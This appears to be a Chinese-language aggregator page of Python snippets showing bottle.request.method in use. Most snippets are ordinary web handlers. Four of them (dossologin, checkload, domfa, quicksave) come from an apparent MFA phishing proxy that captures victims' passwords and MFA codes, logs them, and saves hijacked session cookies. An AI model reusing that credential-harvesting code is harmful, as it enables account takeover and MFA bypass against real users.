我们从Python开源项目中,提取了以下15个代码示例,用于说明如何使用bottle.request.method()。
def init_audit(log_group): def audit(f): @functools.wraps(f) def handle(account_id, *args, **kw): envelope = { 'timestamp': int(time.time() * 1000), 'message': json.dumps({ 'user': request.environ.get('REMOTE_USER', ''), 'url': request.url, 'path': request.path, 'method': request.method, 'pid': os.getpid(), 'account_id': account_id, 'ip': request.remote_addr}) } transport.send_group("%s=%s" % (log_group, account_id), [envelope]) return f(account_id, *args, **kw) return handle return audit
def echo(): try: body = request.body.read().decode('utf-8') except: body = None result = { 'method': request.method, 'headers': dict(request.headers), 'body': body, 'files': [ {'key': key, 'name': request.files[key].raw_filename} for key in request.files ] } return result
def dossologin(): if request.method == 'OPTIONS': return {} else: request_params = request.query.decode() user_username = request_params['username'] user_pass = request_params['pass'] print('dossologin =======================================') print('User provided username: '+user_username) print('User provided password: '+user_pass) log('Username: '+str(user_username)) log('Password: '+str(user_pass)) auth_type = do_usernamepass_login(user_username, user_pass, global_driver) return auth_type ########################################################################## # STAGE 2 - COLLECT MFA TOKEN OR ACCEPT NOTIFCATION ##########################################################################
def checkload(): """ If the user doesn't have a sign in button, the phishing page will poll this to see if the page has been loaded """ if request.method == 'OPTIONS': return {} else: currentURL = global_driver.current_url print('Current URL is: '+currentURL) if currentURL == PROTECTED_RESOURCE: return '1' print('Saving creds and screenshot') time.sleep(3) quicksave() else: return '0'
def enable_cors(func): def _enable_cors(*args, **kwargs): hds = response.headers hds['Access-Control-Allow-Origin'] = '*' hds['Access-Control-Allow-Methods'] = ', '.join(['PUT', 'GET', 'POST', 'DELETE', 'OPTIONS']) allow = 'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token' hds['Access-Control-Allow-Headers'] = allow if request.method != 'OPTIONS': return func(*args, **kwargs) return _enable_cors
def apply(self, callback, route): def wrapped(*args, **kwargs): if not self.tracer or not self.tracer.enabled: return callback(*args, **kwargs) resource = "%s %s" % (request.method, request.route.rule) # Propagate headers such as x-datadog-trace-id. if self.distributed_tracing: propagator = HTTPPropagator() context = propagator.extract(request.headers) if context.trace_id: self.tracer.context_provider.activate(context) with self.tracer.trace("bottle.request", service=self.service, resource=resource) as s: code = 0 try: return callback(*args, **kwargs) except Exception: # bottle doesn't always translate unhandled exceptions, so # we mark it here. code = 500 raise finally: s.set_tag(http.STATUS_CODE, code or response.status_code) s.set_tag(http.URL, request.path) s.set_tag(http.METHOD, request.method) return wrapped
def printer(): if request.method == 'POST': from project.models.Printer import Printer printer = Printer() message = printer.show_string(request.forms.get('text')) return template('printer/index', message=message) return template('printer/print', message='')
def index(): auth = AWS4Auth(config.aws_service_credentials.access_key, config.aws_service_credentials.secret_key, config.aws_service_region, config.aws_service_name) endpoint = config.aws_service_protocol + "://" + config.aws_service_endpoint + request.path + "?" + request.query_string proxy_req_header = {} for header in request.headers: if header.lower() in PROXY_REQ_HEADERS_WHITELIST: proxy_req_header[header] = request.headers[header] if request.method == "HEAD": requests_response = requests.head(endpoint, auth=auth, headers=proxy_req_header) elif request.method == "GET": requests_response = requests.get(endpoint, auth=auth, headers=proxy_req_header) elif request.method == "POST": proxy_req_body = request.body.getvalue() requests_response = requests.post( endpoint, auth=auth, data=proxy_req_body, headers=proxy_req_header) elif request.method == "PUT": proxy_req_body = request.body.getvalue() requests_response = requests.put( endpoint, auth=auth, data=proxy_req_body, headers=proxy_req_header) else: logging.error("Method not allowed") response.body = requests_response.content for header in requests_response.headers: if not header.lower() in PROXY_RESP_HEADERS_BLACKLIST: response.add_header(header, requests_response.headers[header]) return response
def create_routes(host, port): """ Define registry routes """ @route("/runtimes/", method=['OPTIONS', 'GET']) def get_registry(): """ Get data about rill runtime """ from rill.runtime import Runtime response.set_header('Access-Control-Allow-Origin', '*') response.set_header('Access-Control-Allow-Methods', 'GET, OPTIONS') response.set_header('Allow', 'GET, OPTIONS') response.set_header( 'Access-Control-Allow-Headers', 'Content-Type, Authorization' ) if request.method == 'OPTIONS': return 'GET,OPTIONS' response.content_type = 'application/json' runtime = Runtime() runtime_meta = runtime.get_runtime_meta() runtime_meta['address'] = address = 'ws://{}:{}'.format(host, port) runtime_meta['protocol'] = 'websocket' runtime_meta['id'] = 'rill_' + urlparse(address).netloc runtime_meta['seen'] = str(datetime.now()) return json.dumps([runtime_meta])
def domfa(): """ Web app method to accept, decode and parse parameters related to loggin in with MFA token. Calls do_mfa_code_entry to enter MFA. """ if request.method == 'OPTIONS': return {} else: request_params = request.query.decode() user_mfa_code = request_params['code'] print('domfa =======================================') print('User provided MFA Auth Code: '+user_mfa_code) do_mfa_code_entry(user_mfa_code, global_driver) return 'Ok'
def quicksave(): """Calling this will save cookies and whatnot to disk for later user""" print('FLASHSAVE: Cookies and screenshot') mfa_cookies = global_driver.get_cookies() print(' flashsaving cookies: '+str(mfa_cookies)) save_obj(mfa_cookies,'cookies_'+get_timestamp()+'.txt') # load using add_cookies global_driver.get_screenshot_as_file('saves/screenie'+get_timestamp()+'.png') return '0x00000000' ########################################################################## # BOTTLE CONFIGURATION/SETUP STUFF ########################################################################## # Enable CORS - Future TODO: Communicate back to JavaScript auth method # and have the login portal properly set up auth method # From: https://gist.github.com/richard-flosi/3789163
def contact(db): """ Our contact-us form, basically, present a form if it's a GET request, validate and process the form if it's a POST request. Filthy but works. """ form = ContactForm(request.POST, nocaptcha={'ip_address': '127.0.0.1'}) if request.method == 'POST' and form.validate(): # process the form, captcha is valid. message_text = "Contact Email: {email}\n\n {contact_text}".format( email=form.email.data, contact_text=form.contact_text.data ) # put together a gmail client for sending messages gmail_client = GMail(settings.ADMIN_EMAIL, settings.ADMIN_EMAIL_PASSWORD) message = Message('[xqzes] Contact Form', to=settings.ADMIN_EMAIL, text=message_text) gmail_client.send(message) return redirect("/contact/?contacted=True") return template( 'contact', form=form, contacted=strtobool(request.GET.get('contacted', 'false')) )
def generic_handler(): """ The generic handler catches all requests not caught by any other route. It checks the configuration to see if the URL requested is one registered as a job's webhook URL handler. If so, it normalizes the request and queues the job for building. It returns immediately (aynsc) with a JSON structure containing the job id. """ jobdef_manager = request.deps['jobdef_manager'] build_queue = request.deps['build_queue'] config = request.deps['config'] providers = request.deps['providers'] jobdef = jobdef_manager.get_jobdef_from_url(request.path) if not jobdef: abort(404, "Not found") logging.info("Received event for job '{}'".format(jobdef.name)) # Log debug info about the received request logging.debug("request environ: {}".format(request.environ)) logging.debug("request path: {}".format(request.path)) logging.debug("request method: {}".format(request.method)) for k, v in request.headers.items(): logging.debug("request header: {}={}".format(k, v)) for k, v in request.query.items(): logging.debug("request query: {}={}".format(k, v)) logging.debug("request body: {}".format(request.body.read())) logging.debug("request auth: {}".format(request.auth)) env = job.make_env(request, jobdef, providers) job_inst = jobdef.make_job(request.body.read().decode('utf8'), env) build_queue.put(job_inst) return {'id': job_inst.id}
def talk_api(): """ ?????????API GET -> ??????? POST -> ??????? json eg. [ { talk_time:2016-09-17 15:00:49.937402 username:sayamada chat_data:???? } : }, { talk_time:2016-09-17 15:58:03.200027 username:sayamada chat_data:????? }, { talk_time:2016-09-17 15:58:12.289631 username:sayamada chat_data:?????? } ] :return: """ if request.method == "GET": talk_list = get_talk() return json.dumps(talk_list) elif request.method == "POST": # ????????????get????getunicode??? chat_data = request.POST.getunicode("chat") # ????cookie???? username = request.get_cookie("username") # ?????? talk_time = datetime.now() # ???? save_talk(talk_time, username, chat_data) return json.dumps({ "status": "success" })
def submit(db): # TODO: break this out along with others in to an excuses package. class SubmissionForm(Form): attribution_name = StringField( 'Your Name (for future attribution purposes)', [ validators.InputRequired(), validators.Length( min=3, max=50, message="Srsly, give us a decent username " "(%(min)d - %(max)d chars)," " doesn't even have to be real." ) ] ) excuse = TextAreaField( 'What\'s YOUR excuse !?!?', [ validators.Length( min=5, max=140, message="Please provide %(min)d - %(max)d " "characters"), ] ) nocaptcha = NoCaptchaField( public_key=settings.RECAPTCHA_SITE_KEY, private_key=settings.RECAPTCHA_SECRET_KEY, secure=True, ) form = SubmissionForm(request.POST, nocaptcha={'ip_address': '127.0.0.1'}) submitted = False if request.method == 'POST' and form.validate(): excuse_record = Excuse(form.attribution_name.data, form.excuse.data) db.add(excuse_record) submitted = True return template('submit', form=form, submitted=submitted)